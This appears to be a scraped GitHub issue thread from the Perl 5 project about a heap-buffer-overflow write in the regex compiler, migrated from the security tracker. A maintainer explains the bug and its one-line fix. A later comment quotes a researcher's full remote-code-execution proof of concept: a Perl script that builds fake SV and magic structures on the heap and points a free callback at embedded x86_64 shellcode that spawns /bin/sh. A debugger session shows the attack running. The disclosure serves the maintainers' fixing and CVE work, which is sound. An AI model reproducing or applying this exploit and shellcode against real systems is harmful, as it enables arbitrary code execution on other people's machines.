\"S_mg_free_struct\" not defined.\u003cbr\u003e\nsh-4.4$ date\u003cbr\u003e\nDetaching after fork from child process 13509.\u003cbr\u003e\nMon Aug 27 22​:04​:46 JST 2018\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e2018-08-16 12​:52 GMT+09​:00 Karl Williamson via RT \u0026lt;\u003cbr\u003e\nperl5-security-report-followup@​perl.org\u0026gt;​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eResending this as it did not make it to the list​:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOn Wed, 15 Aug 2018 11​:01​:24 -0700, khw wrote​:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eI suspect this is a serious security issue. One can position where\u003cbr\u003e\nbeyond the end of buffer gets written by adding \\x80's to the ones\u003cbr\u003e\nalready there. But I'd be happy to be wrong about this.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe cause is one branch during the parsing leaves the parse pointer\u003cbr\u003e\npositioned one too far, and that causes the backslash to be skipped\u003cbr\u003e\nduring pass2, which causes a ']' to be treated as a metacharacter\u003cbr\u003e\ninstead of a literal.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe fix is to remove the single line that incorrectly increments the\u003cbr\u003e\nparse pointer.\u003cbr\u003e\nI don't know that this being an experimental feature has any bearing\u003cbr\u003e\non it.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThere is another thing. The minus sign in this case could have been\u003cbr\u003e\ncaught as incorrect. 
But the same out-of-bounds writes would occur if\u003cbr\u003e\na '^' replaced the minus, and that would be a correct use.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eKarl Williamson\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/blockquote\u003e","bodyVersion":"d2f8bfc20b4100d145e7d7f3e591fce14018fd986657728b6c9ffc8ba490bc0d","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097445","createdAt":"2018-08-27T13:41:33Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZXuePsgAqTU0NDA5NzQ0NQ==
"},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097448,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ0OA==","body":"### From @khwilliamson\n\nOn 08/27/2018 07\u0026#8203;:16 AM\\, Eiichi Tsukata wrote\u0026#8203;:\n\u003e The following code generates a regexp which executes arbitrary command \n\u003e during global destruction\\.\n\u003e It overwrites some SV pointer address to a crafted fake SV on \n\u003e overwritten heap which has the malicious svt\\_free\\(shell\\_code\\) on its \n\u003e magic vtable\\.\n\u003e \n\u003e Limitations\u0026#8203;:\n\u003e \n\u003e   \\- must set \\`execstack \\-s\\` to perl\n\u003e   \\- require address leak\\(exact address of overwritten heap\\)\n\u003e \nShouldn't this be getting a CVE?\n\u003e \\`\\`\\`\n\u003e \\#\\!/usr/bin/perl\n\u003e \n\u003e \\#\n\u003e \\# RCE exploit PoC for\n\u003e \\#   \\[perl \\#133423\\] regcomp\u0026#8203;: heap\\-buffer\\-overflow write\n\u003e \\# on perl\\-blead\\-48ae8dc\n\u003e \\#\n\u003e \n\u003e use strict;\n\u003e use warnings;\n\u003e \n\u003e \\# 0xabcd =\u003e '\\\\xcd\\\\xab\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00'\n\u003e sub h2s \\{\n\u003e     my $h = shift;\n\u003e     my $sz = shift;\n\u003e     my $ret = '';\n\u003e     for \\(0\\.\\.\\($sz \\- 1\\)\\) \\{\n\u003e         $ret \\.= sprintf\\(\"\\\\\\\\x%02x\"\\, \\(\\($h \u003e\u003e \\(8 \\* $\\_\\)\\) \u0026 0xff\\)\\);\n\u003e     \\}\n\u003e     return $ret\n\u003e \\}\n\u003e \n\u003e \\# must set \\`execstack \\-s\\` to perl\n\u003e my $cmd = 'gdb \\-q \\-\\-args \n\u003e 
~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le ';\n\u003e my $prefix = '\\\\'my $r = \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\\\\\\\\\a\\]\\)\\)\\\\\\\\\\\\\\\\\\]a\\\\x00';\n\u003e \n\u003e my $address = 0xa34c7d; \\# overwrite start address\n\u003e                         \\# search with\u0026#8203;:\n\u003e                         \\#   \\(gdb\\) b regcomp\\.c\u0026#8203;:14044\n\u003e                         \\#   \\(gdb\\) p s\n\u003e                         \\# \\[CAUTION\\] must not contain '\\]' \\(0x5d\\)\n\u003e                         \\#\n\u003e my $sv\\_any\\_address     = $address \\+ 8 \\+ 4 \\+ 4 \\+ 8;\n\u003e my $stash\\_address      = $sv\\_any\\_address \\+ 8 \\+ 8;\n\u003e my $stash\\_address2     = $stash\\_address \\+ 8 \\+ 4 \\+ 4;\n\u003e my $magic\\_address      = $stash\\_address \\+ 8 \\+ 4 \\+ 4 \\+ 8 \\+ 8 \\+ 8 \\+ 19 \\+ 8;\n\u003e my $mg\\_virtual\\_address = $magic\\_address \\+ 8 \\+ 8 \\+ 2 \\+ 1 \\+ 1 \\+ 8 \\+ 8 \\+ 8;\n\u003e my $shell\\_code\\_address = $mg\\_virtual\\_address \\+ 8 \\+ 8 \\+ 8 \\+ 8 \\+ 8;\n\u003e \n\u003e my $body =\n\u003e \\# sv\\($address\\)\n\u003e   h2s\\($sv\\_any\\_address\\, 8\\)\n\u003e \\. h2s\\(0x01\\, 4\\)                \\# sv\\_refcnt\n\u003e \\. h2s\\(0x100007\\, 4\\)            \\# sv\\_flags \\(SVt\\_PVMG || SVs\\_OBJECT\\)\n\u003e \\. h2s\\(0x00\\, 8\\)                \\# sv\\-\u003esv\\_u\\.svu\\_pv\n\u003e \\# any\\($sv\\_any\\_address\\)\n\u003e \\. h2s\\($stash\\_address\\, 8\\)      \\# HV\\* xmg\\_stash\n\u003e \\. h2s\\($magic\\_address\\, 8\\)      \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\u003e \n\u003e \\# xmg\\_stash\\($stash\\_address\\)\n\u003e \\. h2s\\($stash\\_address2\\, 8\\)     \\# sv\\_any\n\u003e \\. h2s\\(0x01\\, 4\\)                \\# sv\\_refcnt\n\u003e \\. h2s\\(0x0c\\, 4\\)                \\# sv\\_flags \\(SVt\\_PVHV\\)\n\u003e \\# any\\($stash\\_address2\\)\n\u003e \\. 
h2s\\(0x00\\, 8\\)                \\# HV\\* xmg\\_stash\n\u003e \\. h2s\\($magic\\_address\\, 8\\)      \\# union \\_xmgu xmg\\_u \\(MAGIC\\* xmg\\_magic\\)\n\u003e \\. h2s\\(0x00\\, 8\\)                \\# padding\n\u003e \n\u003e \\. '\" \\. \"a\" x 19 \\. \"'          \\# padding\n\u003e \\. h2s\\($address\\, 8\\)            \\# OVERWRITE gvp\n\u003e \n\u003e \\# xmg\\_magic\\($magic\\_address\\)\n\u003e \\. h2s\\(0x00\\, 8\\)                \\# MAGIC\\* mg\\_moremagic;\n\u003e \\. h2s\\($mg\\_virtual\\_address\\, 8\\) \\# MGVTBL\\* mg\\_virtual  /\\* pointer to magic \n\u003e functions \\*/\n\u003e \\. h2s\\(0x00\\, 2\\)                \\# U16         mg\\_private;\n\u003e \\. h2s\\(0x00\\, 1\\)                \\# char        mg\\_type;\n\u003e \\. h2s\\(0x00\\, 1\\)                \\# U8          mg\\_flags;\n\u003e \\. h2s\\(0x00\\, 8\\)                \\# SSize\\_t     mg\\_len;\n\u003e \\. h2s\\(0x00\\, 8\\)                \\# SV\\*         mg\\_obj;\n\u003e \\. h2s\\(0x00\\, 8\\)                \\# char\\*       mg\\_ptr;\n\u003e \n\u003e \\# mg\\_virual\\($mg\\_virtual\\_address\\)\n\u003e \\. h2s\\(0x00\\, 8\\)                \\# int  \\(\\*svt\\_get\\)      \\(pTHX\\_ SV \\*sv\\, \n\u003e MAGIC\\* mg\\);\n\u003e \\. h2s\\(0x00\\, 8\\)                \\# int  \\(\\*svt\\_set\\)      \\(pTHX\\_ SV \\*sv\\, \n\u003e MAGIC\\* mg\\);\n\u003e \\. h2s\\(0x00\\, 8\\)                \\# U32  \\(\\*svt\\_len\\)      \\(pTHX\\_ SV \\*sv\\, \n\u003e MAGIC\\* mg\\);\n\u003e \\. h2s\\(0x00\\, 8\\)                \\# int  \\(\\*svt\\_clear\\)\\(pTHX\\_ SV \\*sv\\, MAGIC\\* mg\\);\n\u003e \\. h2s\\($shell\\_code\\_address\\, 8\\) \\# int  \\(\\*svt\\_free\\)     \\(pTHX\\_ SV \\*sv\\, \n\u003e MAGIC\\* mg\\);\n\u003e \n\u003e \\# x86\\_64 shell\\_code\n\u003e \\. 
\n\u003e '\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05'\n\u003e \n\u003e \\. '\\]\\)a\\\\\\\\\\\\\\\\6\"; qr/$r/\\\\'';\n\u003e \n\u003e my $payload = $prefix \\. $body;\n\u003e \n\u003e print $cmd \\. $payload \\. \"\\\\n\";\n\u003e \\`\\`\\`\n\u003e \n\u003e Sample output\n\u003e \n\u003e \\`\\`\\`\n\u003e \\[eiichi@\u0026#8203;x1 exploit\\]$ perl perl\\_regexp\\_mg\\_free\\.pl \n\u003e \\\u003chttp\u0026#8203;://perl\\_regexp\\_mg\\_free\\.pl\u003e\n\u003e gdb \\-q \\-\\-args ~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le \n\u003e 'my $r = \n\u003e \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\" \n\u003e \\. \"a\" x 19 \\. 
\n\u003e \"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\"; \n\u003e qr/$r/'\n\u003e \\[eiichi@\u0026#8203;x1 exploit\\]$ gdb \\-q \\-\\-args \n\u003e ~/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le 'my $r = \n\u003e \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\" \n\u003e \\. \"a\" x 19 \\. 
\n\u003e \"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\"; \n\u003e qr/$r/'\n\u003e Reading symbols from \n\u003e /home/eiichi/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl\\.\\.\\.done\\.\n\u003e \\(gdb\\) b regcomp\\.c\u0026#8203;:14044\n\u003e Breakpoint 1 at 0x4cb38d\u0026#8203;: file regcomp\\.c\\, line 14044\\.\n\u003e \\(gdb\\) run\n\u003e Starting program\u0026#8203;: \n\u003e /home/eiichi/perl5/perlbrew/perls/perl\\-blead\\-debug/bin/perl \\-DorD \\-le \n\u003e my\\\\ \\\\$r\\\\ =\\\\ \n\u003e 
\\\\\"\\\\\\(\\\\?\\\\\\[\\\\\\(\\\\?x\u0026#8203;:\\\\\\(\\\\?\\\\\\[\\\\\\\\\\\\\\\\a\\\\\\]\\\\\\)\\\\\\)\\\\\\\\\\\\\\\\\\\\\\]a\\\\\\\\x00\\\\\\\\x95\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x07\\\\\\\\x00\\\\\\\\x10\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xa5\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xe8\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xb5\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x0c\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\xe8\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\"\\\\ \n\u003e \\.\\\\ \\\\\"a\\\\\"\\\\ x\\\\ 19\\\\ \\.\\\\ \n\u003e 
\\\\\"\\\\\\\\x7d\\\\\\\\x4c\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x14\\\\\\\\x4d\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x3c\\\\\\\\x4d\\\\\\\\xa3\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x48\\\\\\\\x31\\\\\\\\xd2\\\\\\\\x52\\\\\\\\x48\\\\\\\\xb8\\\\\\\\x2f\\\\\\\\x62\\\\\\\\x69\\\\\\\\x6e\\\\\\\\x2f\\\\\\\\x2f\\\\\\\\x73\\\\\\\\x68\\\\\\\\x50\\\\\\\\x48\\\\\\\\x89\\\\\\\\xe7\\\\\\\\x52\\\\\\\\x57\\\\\\\\x48\\\\\\\\x89\\\\\\\\xe6\\\\\\\\x48\\\\\\\\x8d\\\\\\\\x42\\\\\\\\x3b\\\\\\\\x0f\\\\\\\\x05\\\\\\]\\\\\\)a\\\\\\\\\\\\\\\\6\\\\\"\\\\;\\\\ \n\u003e qr/\\\\$r/\n\u003e \\[Thread debugging using libthread\\_db enabled\\]\n\u003e Using host libthread\\_db library \"/lib64/libthread\\_db\\.so\\.1\"\\.\n\u003e warning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\n\u003e warning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\n\u003e warning\u0026#8203;: Loadable section \"\\.note\\.gnu\\.property\" outside of ELF segments\n\u003e \\(\\-e\u0026#8203;:0\\)  sv\\_upgrade clearing PL\\_stashcache\n\u003e \\(\\-e\u0026#8203;:0\\)  sv\\_upgrade clearing PL\\_stashcache\n\u003e 
\\(\\-e\u0026#8203;:0\\)  sv\\_upgrade clearing PL\\_stashcache\n\u003e \\(\\-e\u0026#8203;:0\\)  sv\\_upgrade clearing PL\\_stashcache\n\u003e \\(\\-e\u0026#8203;:0\\)  sv\\_upgrade clearing PL\\_stashcache\n\u003e \\(\\-e\u0026#8203;:2\\)  Looking for DESTROY method for IO\u0026#8203;::File\n\u003e \\(\\-e\u0026#8203;:2\\)  Looking for method DESTROY in package IO\u0026#8203;::File\n\u003e \\(\\-e\u0026#8203;:2\\)  Looking for method DESTROY in package UNIVERSAL\n\u003e \\(\\-e\u0026#8203;:2\\)  Looking for method AUTOLOAD in package IO\u0026#8203;::File\n\u003e \\(\\-e\u0026#8203;:2\\)  Looking for method AUTOLOAD in package UNIVERSAL\n\u003e \\(\\-e\u0026#8203;:2\\)  Set cached DESTROY method 0 for IO\u0026#8203;::File\n\u003e Enabling $\\` $\u0026 $' support \\(0x7\\)\\.\n\u003e \n\u003e EXECUTING\\.\\.\\.\n\u003e \n\u003e Compiling REx \n\u003e \"\\(?\\[\\(?x\u0026#8203;:\\(?\\[\\\\a\\]\\)\\)\\\\\\]a%0%x\\{95\\}L%x\\{a3\\}%0%0%0%0%0%1%0%0%0%7%0%20%0\"\\.\\.\\.\n\u003e The regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in \n\u003e m/\\(?\\[ \\\u003c\\-\\- HERE \\(?x\u0026#8203;:\\(?\\[\\\\a\\]\\)\\)\\\\\\]a?L??L???L?\n\u003e \n\u003e \n\u003e  ?aaaaaaaaaaaaaaaaaaa\\}L?M?\\\u003cM?H1H?/bin//shPH?WH??B;\\]\\)a\\\\6/ at \\-e line 1\\.\n\u003e The regex\\_sets feature is experimental in regex; marked by \\\u003c\\-\\- HERE in \n\u003e m/\\(?\\[\\(?x\u0026#8203;:\\(?\\[ \\\u003c\\-\\- HERE \\\\a\\]\\)\\)\\\\\\]a?L??L???L?\n\u003e \n\u003e \n\u003e  ?aaaaaaaaaaaaaaaaaaa\\}L?M?\\\u003cM?H1H?/bin//shPH?WH??B;\\]\\)a\\\\6/ at \\-e line 1\\.\n\u003e \n\u003e Breakpoint 1\\, S\\_regatom \\(pRExC\\_state=pRExC\\_state@\u0026#8203;entry=0x7fffffffcd40\\, \n\u003e flagp=flagp@\u0026#8203;entry=0x7fffffffca24\\,\n\u003e     depth=depth@\u0026#8203;entry=4\\) at regcomp\\.c\u0026#8203;:14044\n\u003e 14044                               \\*\\(s\\)\\+\\+ = \\(U8\\) ender;\n\u003e Missing separate debuginfos\\, use\u0026#8203;: dnf 
debuginfo\\-install \n\u003e keyutils\\-libs\\-1\\.5\\.10\\-6\\.fc28\\.x86\\_64 krb5\\-libs\\-1\\.16\\.1\\-13\\.fc28\\.x86\\_64 \n\u003e libcom\\_err\\-1\\.44\\.2\\-0\\.fc28\\.x86\\_64 \n\u003e libnsl2\\-1\\.2\\.0\\-2\\.20180605git4a062cf\\.fc28\\.x86\\_64 \n\u003e libselinux\\-2\\.8\\-1\\.fc28\\.x86\\_64 libtirpc\\-1\\.0\\.3\\-3\\.rc2\\.fc28\\.x86\\_64 \n\u003e libxcrypt\\-4\\.1\\.1\\-4\\.fc28\\.x86\\_64 openssl\\-libs\\-1\\.1\\.0h\\-3\\.fc28\\.x86\\_64 \n\u003e pcre2\\-10\\.31\\-8\\.fc28\\.x86\\_64 zlib\\-1\\.2\\.11\\-8\\.fc28\\.x86\\_64\n\u003e \\(gdb\\) p s\n\u003e $1 = 0xa34c7d \"\"\n\u003e \\(gdb\\) b S\\_mg\\_free\\_struct\n\u003e Breakpoint 2 at 0x4f0620\u0026#8203;: file mg\\.c\\, line 556\\.\n\u003e \\(gdb\\) dis br 1\n\u003e \\(gdb\\) c\n\u003e Continuing\\.\n\u003e panic\u0026#8203;: reg\\_node overrun trying to emit 0\\, a34d5c\u003e=a34c8c at \\-e line 1\\.\n\u003e Cleaning named glob SV object\u0026#8203;:\n\u003e  SV = PVMG\\(0xa34c95\\) at 0xa34c7d\n\u003e   REFCNT = 1\n\u003e   FLAGS = \\(OBJECT\\)\n\u003e   IV = 0\n\u003e   NV = 5\\.28751820946919e\\-317\n\u003e   PV = 0\n\u003e   MAGIC = 0xa34ce8\n\u003e     MG\\_VIRTUAL = 0xa34d14\n\u003e     MG\\_TYPE = PERL\\_MAGIC\\_sv\\(\\\\0\\)\n\u003e   STASH = 0xa34ca5\n\u003e \n\u003e Breakpoint 2\\, S\\_mg\\_free\\_struct \\(sv=sv@\u0026#8203;entry=0xa34ca5\\, mg=0xa34ce8\\) at \n\u003e mg\\.c\u0026#8203;:556\n\u003e 556         const MGVTBL\\* const vtbl = mg\\-\u003emg\\_virtual;\n\u003e \\(gdb\\) bt\n\u003e \\#0  S\\_mg\\_free\\_struct \\(sv=sv@\u0026#8203;entry=0xa34ca5\\, mg=0xa34ce8\\) at mg\\.c\u0026#8203;:556\n\u003e \\#1  0x00000000004f1153 in Perl\\_mg\\_free \\(sv=sv@\u0026#8203;entry=0xa34ca5\\) at mg\\.c\u0026#8203;:588\n\u003e \\#2  0x0000000000527d9e in Perl\\_sv\\_clear \\(orig\\_sv=orig\\_sv@\u0026#8203;entry=0xa34ca5\\) \n\u003e at sv\\.c\u0026#8203;:6539\n\u003e \\#3  0x0000000000528784 in Perl\\_sv\\_free2 \\(sv=0xa34ca5\\, rc=\\\u003coptimized \n\u003e out\u003e\\) at 
sv\\.c\u0026#8203;:7038\n\u003e \\#4  0x00000000005273ec in S\\_SvREFCNT\\_dec \\(sv=\\\u003coptimized out\u003e\\) at \n\u003e inline\\.h\u0026#8203;:216\n\u003e \\#5  S\\_curse \\(sv=sv@\u0026#8203;entry=0xa34c7d\\, check\\_refcnt=check\\_refcnt@\u0026#8203;entry=true\\) \n\u003e at sv\\.c\u0026#8203;:6970\n\u003e \\#6  0x000000000052783a in Perl\\_sv\\_clear \\(orig\\_sv=orig\\_sv@\u0026#8203;entry=0xa34c7d\\) \n\u003e at sv\\.c\u0026#8203;:6531\n\u003e \\#7  0x0000000000528784 in Perl\\_sv\\_free2 \\(sv=sv@\u0026#8203;entry=0xa34c7d\\, \n\u003e rc=\\\u003coptimized out\u003e\\) at sv\\.c\u0026#8203;:7038\n\u003e \\#8  0x0000000000528c48 in S\\_SvREFCNT\\_dec\\_NN \\(sv=0xa34c7d\\) at inline\\.h\u0026#8203;:227\n\u003e \\#9  